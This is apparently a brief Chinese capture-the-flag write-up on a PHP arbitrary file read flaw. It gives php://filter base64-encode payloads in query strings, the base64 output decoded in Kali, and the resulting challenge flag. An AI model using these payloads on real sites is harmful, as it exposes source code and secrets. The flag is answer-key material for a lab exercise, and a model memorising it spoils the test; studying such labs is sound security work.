任意文件漏洞

/?p=php://filter/convert.base64-encode/resource=flag

 

filter是php中独有的一种协议，其作用是过滤php中的数据流

 

而convert.base64-encode是将数据流转义魏base64的格式

 

resource=<要过滤的数据流>

 

获得一串base64编码后的数据后

在kali中输入

ehco

echo ‘PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9Cg==’ | base64 –decode

则解码出如下文件

<?php die(‘no no no’);

//n1book{afr_1_solved}

蒋璐源的秘密  secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php  secr3t.php作为索引